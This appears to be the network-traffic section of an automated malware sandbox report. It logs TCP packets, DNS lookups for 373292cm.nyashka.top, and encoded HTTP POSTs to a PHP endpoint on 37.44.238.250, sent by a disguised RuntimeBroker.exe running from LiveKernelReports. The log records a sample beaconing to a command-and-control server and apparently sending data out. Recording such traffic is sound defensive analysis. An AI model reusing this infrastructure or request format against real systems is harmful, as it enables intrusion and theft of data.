                                                                                  Jan 11, 2025 06:44:43.481333971 CET5714280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:43.481704950 CET5714380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:43.483239889 CET5714480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:43.486443043 CET805714237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:43.486504078 CET5714280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:43.486665010 CET805714337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:43.486828089 CET5714380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:43.488104105 CET805714437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:43.488389015 CET5714480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:43.488631964 CET5714480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:43.493369102 CET805714437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:43.832822084 CET5714480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:43.837816000 CET805714437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:43.837833881 CET805714437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:43.837842941 CET805714437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:44.126199961 CET805714437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:44.177110910 CET5714480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:44.256167889 CET805714437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:44.301467896 CET5714480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:44.381552935 CET5714480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:44.382392883 CET5714580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:44.386584997 CET805714437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:44.386647940 CET5714480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:44.387265921 CET805714537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:44.387357950 CET5714580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:44.387500048 CET5714580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:44.392302036 CET805714537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:44.739110947 CET5714580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:44.744204044 CET805714537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:44.744223118 CET805714537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:44.744234085 CET805714537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:45.016611099 CET805714537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:45.067115068 CET5714580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:45.146462917 CET805714537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:45.192126989 CET5714580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:45.267124891 CET5714580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:45.267771959 CET5714680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:45.272273064 CET805714537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:45.272594929 CET805714637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:45.272855997 CET5714580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:45.272895098 CET5714680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:45.273010969 CET5714680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:45.277777910 CET805714637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:45.629918098 CET5714680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:45.634993076 CET805714637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:45.635020018 CET805714637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:45.635031939 CET805714637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:45.920058012 CET805714637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:45.973401070 CET5714680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:46.087923050 CET805714637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:46.133572102 CET5714680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:46.246315002 CET5714680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:46.248146057 CET5714780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:46.251588106 CET805714637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:46.251646042 CET5714680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:46.253045082 CET805714737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:46.253191948 CET5714780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:46.253304958 CET5714780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:46.258174896 CET805714737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:46.598686934 CET5714780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:46.603635073 CET805714737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:46.603648901 CET805714737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:46.603660107 CET805714737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:46.901236057 CET805714737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:46.942133904 CET5714780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:47.034267902 CET805714737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:47.082794905 CET5714780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:47.163054943 CET5714780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:47.164623976 CET5714880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:47.168180943 CET805714737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:47.168773890 CET5714780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:47.169445038 CET805714837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:47.169576883 CET5714880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:47.169780970 CET5714880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:47.174597025 CET805714837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:47.520479918 CET5714880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:47.525485992 CET805714837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:47.525501966 CET805714837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:47.525510073 CET805714837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:47.797544956 CET805714837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:47.848354101 CET5714880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:47.926518917 CET805714837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:47.958532095 CET5714880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:47.959387064 CET5714980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:47.963690042 CET805714837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:47.963759899 CET5714880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:47.964246988 CET805714937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:47.964421034 CET5714980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:47.964642048 CET5714980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:47.969436884 CET805714937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:48.053848982 CET5715080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:48.054104090 CET5714980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:48.058856010 CET805715037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:48.061692953 CET5715080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:48.061866999 CET5715080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:48.066668034 CET805715037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:48.099670887 CET805714937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:48.410943031 CET5715080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:48.415980101 CET805715037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:48.416017056 CET805715037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:48.416033983 CET805715037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:48.419868946 CET805714937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:48.419935942 CET5714980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:48.689635992 CET805715037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:48.738974094 CET5715080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:48.818295002 CET805715037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:48.863970995 CET5715080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.077222109 CET5715080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.078000069 CET5715180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.082321882 CET805715037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:49.082395077 CET5715080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.082789898 CET805715137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:49.082895994 CET5715180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.083321095 CET5715180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.088087082 CET805715137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:49.442249060 CET5715180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.447283030 CET805715137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:49.447304964 CET805715137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:49.447331905 CET805715137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:49.712140083 CET805715137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:49.754605055 CET5715180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.842535973 CET805715137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:49.895211935 CET5715180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.977420092 CET5715180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.978584051 CET5715280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.982553959 CET805715137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:49.982652903 CET5715180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.983383894 CET805715237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:49.983457088 CET5715280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.983584881 CET5715280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:49.988346100 CET805715237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:50.333131075 CET5715280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:50.338007927 CET805715237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:50.338021994 CET805715237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:50.338032961 CET805715237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:50.630279064 CET805715237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:50.676476002 CET5715280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:50.762231112 CET805715237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:50.817107916 CET5715280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:50.881917000 CET5715380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:50.886846066 CET805715337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:50.886924982 CET5715380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:50.887586117 CET5715380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:50.892394066 CET805715337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:51.239242077 CET5715380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:51.244151115 CET805715337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:51.244170904 CET805715337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:51.244180918 CET805715337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:51.512744904 CET805715337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:51.567670107 CET5715380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:51.646188021 CET805715337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:51.692102909 CET5715380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:51.824816942 CET5715380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:51.830244064 CET5715480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:51.831507921 CET805715337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:51.831583977 CET5715380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:51.836841106 CET805715437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:51.836963892 CET5715480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:51.837084055 CET5715480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:51.843595982 CET805715437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:52.192189932 CET5715480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:52.199126005 CET805715437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:52.199171066 CET805715437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:52.199199915 CET805715437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:52.468055964 CET805715437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:52.520268917 CET5715480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:52.701010942 CET805715437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:52.701045990 CET805715437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:52.701098919 CET5715480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:52.834202051 CET5715480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:52.834933996 CET5715580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:52.839374065 CET805715437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:52.839554071 CET5715480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:52.839932919 CET805715537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:52.839993954 CET5715580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:52.840137005 CET5715580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:52.844981909 CET805715537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.070982933 CET5715580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.071520090 CET5715680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.076493979 CET805715637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.076560020 CET5715680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.076770067 CET5715680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.081566095 CET805715637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.119714022 CET805715537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.191298008 CET5715780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.196357012 CET805715737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.196449041 CET5715780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.196543932 CET5715780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.201338053 CET805715737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.310178995 CET805715537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.310249090 CET5715580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.426698923 CET5715680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.431830883 CET805715637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.431864023 CET805715637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.552054882 CET5715780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.557271957 CET805715737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.557317019 CET805715737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.557353020 CET805715737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.714298010 CET805715637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.757642984 CET5715680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.835568905 CET805715737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.848280907 CET805715637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:53.881728888 CET5715780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.895241976 CET5715680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:53.964438915 CET805715737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:54.004966974 CET5715780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:54.080357075 CET5715280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:54.080434084 CET5715680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:54.080641031 CET5715780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:54.081747055 CET5715880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:54.086034060 CET805715637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:54.086051941 CET805715737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:54.086111069 CET5715680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:54.086113930 CET5715780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:54.086575985 CET805715837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:54.087214947 CET5715880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:54.087282896 CET5715880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:54.092116117 CET805715837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:54.735246897 CET805715837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:54.785866022 CET5715880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:45:05.548161030 CET5715880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:45:05.553208113 CET805715837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:45:05.553221941 CET805715837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:45:05.553232908 CET805715837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:45:05.812400103 CET805715837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:45:05.812675953 CET5715880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:45:05.817806005 CET805715837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:45:05.817878962 CET5715880192.168.2.637.44.238.250

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 11, 2025 06:43:06.120949984 CET53533711.1.1.1192.168.2.6
                                                                                  Jan 11, 2025 06:43:14.664320946 CET5242553192.168.2.61.1.1.1
                                                                                  Jan 11, 2025 06:43:14.671338081 CET53524251.1.1.1192.168.2.6

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Jan 11, 2025 06:43:14.664320946 CET192.168.2.61.1.1.10xb54fStandard query (0)373292cm.nyashka.topA (IP address)IN (0x0001)false
                                                                                  Jan 11, 2025 06:43:14.676865101 CET192.168.2.61.1.1.10x1Standard query (0)373292cm.nyashka.topA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Jan 11, 2025 06:43:15.187534094 CET1.1.1.1192.168.2.60x1No error (0)373292cm.nyashka.top37.44.238.250A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • 373292cm.nyashka.top

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.65690537.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:15.226346016 CET280OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 344
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:15.583816051 CET344OUTData Raw: 00 0b 04 05 06 00 01 0b 05 06 02 01 02 0c 01 01 00 06 05 0e 02 05 03 0b 00 05 0e 05 07 0f 06 06 0f 51 05 0f 01 07 03 01 0c 07 05 50 05 51 07 02 07 04 0f 0e 0f 0e 07 01 07 57 03 02 06 04 06 0d 05 07 0d 0d 07 06 07 51 0e 50 0f 03 0e 0c 0c 54 05 07
                                                                                  Data Ascii: QPQWQPT]QS\L}U^y_`baOvfcU|Rf^`llMh`tx|{{pu_mx`IpL~O~V@xSb}b}
                                                                                  Jan 11, 2025 06:43:15.863224983 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:15.942276001 CET1236INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:15 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 1320
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 56 4a 7e 01 78 53 64 5e 7b 4c 60 05 7f 61 7b 06 7d 49 78 53 7c 5e 7d 41 6e 70 73 5c 7d 5c 74 02 63 73 79 40 7a 72 7d 00 76 58 60 48 7d 5b 78 01 55 4b 71 09 74 5c 7f 4b 7f 04 75 04 7f 5e 62 0d 79 66 60 08 7e 73 7f 4a 62 62 5f 06 60 58 6a 59 7e 62 62 02 7f 7f 70 4e 7e 5e 77 06 62 5c 7b 06 7c 5c 5f 47 7c 63 75 01 6c 74 74 4e 6f 59 52 4f 7b 53 74 5a 7a 4c 6c 01 6c 63 7e 05 7d 60 74 44 79 67 60 07 7c 61 7b 05 75 72 70 49 7a 51 41 5b 68 5e 7c 40 7f 71 6e 54 76 52 6b 5f 6f 6c 74 03 77 06 6e 0d 79 62 6d 47 6a 42 54 06 6f 72 66 46 77 63 5e 5a 76 07 64 07 76 71 7a 50 7e 5d 79 5f 77 4c 6d 04 76 66 74 09 7e 6f 75 04 60 6f 6b 5d 7f 05 7c 03 78 6f 73 03 7a 60 66 44 7c 6e 7f 51 77 49 6c 07 7e 62 62 09 69 7d 5a 55 78 53 7d 5d 7e 62 69 03 7b 5d 46 51 6b 52 5d 52 7d 60 56 0b 7d 77 75 5d 6c 6d 7b 49 7b 71 64 00 7e 71 78 5b 7e 49 55 0a 68 4e 5c 55 7b 63 78 07 7d 61 7c 49 63 5a 7d 51 7b 5c 79 06 75 66 56 4b 7e 58 56 06 7e 66 71 0d 76 72 73 06 7f 5c 5b 05 7f 67 6a 0d 7b 58 74 09 7e 73 67 02 76 62 75 02 76 71 69 00 7c 4f [TRUNCATED]
                                                                                  Data Ascii: VJ~xSd^{L`a{}IxS|^}Anps\}\tcsy@zr}vX`H}[xUKqt\Ku^byf`~sJbb_`XjY~bbpN~^wb\{|\_G|culttNoYRO{StZzLllc~}`tDyg`|a{urpIzQA[h^|@qnTvRk_oltwnybmGjBTorfFwc^ZvdvqzP~]y_wLmvft~ou`ok]|xosz`fD|nQwIl~bbi}ZUxS}]~bi{]FQkR]R}`V}wu]lm{I{qd~qx[~IUhN\U{cx}a|IcZ}Q{\yufVK~XV~fqvrs\[gj{Xt~sgvbuvqi|Or~|t@~gDuOY{Ly~`iywtxg^MxSYHybdHzcz}``{gx~\svap||Q}g`|qaAv|Zx|tIt`byqeJ~RfxOfFvsswa^var|NrtLiBv[`RyLwRp|]hJxBz`v}`wgR~rvB}SU{mnN}\y}pxAlZNph}YT{CQ{bt~qg}wQ@~`Wys^M}rtFtMqBzO[IuHZ}f|}vu@wbQ\}|gzxXZO~ssubaAtOiqbI~BlA~IUuO{rqI}N_{whywpxCQzblHxsPL{]NZxYsY~qx\wa|}BUYh@}bqAvRwZolUYw^vzqm}BT_z\yvxBagx[L~Jx^bcrT^veoSkRv^wk_|p|K{oglNXh}l`g^jaqTzSYQfn^jfbQYwRS{@QlkPWta^o~Zzu{Z|Xg}Yg~puncx~rtK`]amOj^vcY|fdfive{WOz[hdNTzoVR`V[[nN]bnJUvzyRRL~wkFua{Jy\}|gq@^]XT{FRnVAUZ[Toe{^VZb^czpZA[XFWbZW`xK{XPUZ{EQoUA[X@nbP@Q_z\y~boUTobOXL~JxYW[[zF\f]HSTLco]ESwTd^|^\Z{PNPco@SqOiZMm}Zj\A [TRUNCATED]
                                                                                  Jan 11, 2025 06:43:15.942298889 CET241INData Raw: 45 51 71 48 04 68 01 5f 4c 6e 00 77 4e 57 60 07 00 5b 58 54 79 60 62 09 5c 78 5f 5c 58 66 6f 00 49 54 74 64 58 71 73 7c 00 6c 6e 6a 5c 50 4d 7a 45 6c 5a 7b 76 54 64 6f 4c 57 6e 7c 59 7e 5f 42 58 6f 05 61 40 51 73 41 02 6c 01 59 46 6b 04 78 41 5a
                                                                                  Data Ascii: EQqHh_LnwNW`[XTy`b\x_\XfoITtdXqs|lnj\PMzElZ{vTdoLWn|Y~_BXoa@QsAlYFkxAZ[g@QU`GVvNhraPwQp_y{{_ccNV}b^RoPlD\pZFbbmXqMkgzp_qFq\]TSrF]o]ES[@o`dBQ|eXhjppZpEy[STQtKQnSFRZDPVS`kjsdQ|Z~]yzx]laFS}d]Rd^Us\LnoICR[`Xv^yQRm
                                                                                  Jan 11, 2025 06:43:15.979217052 CET256OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 384
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:16.179730892 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:16.180250883 CET384OUTData Raw: 5a 51 5c 51 54 49 54 5c 5b 5f 5a 51 59 5e 58 56 57 58 5d 5f 57 5b 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZQ\QTIT\[_ZQY^XVWX]_W[S\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-;#0"=_#0*)-<>>+47<$ !(Q?)X70\,.&F$.Y/
                                                                                  Jan 11, 2025 06:43:16.440637112 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:16 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
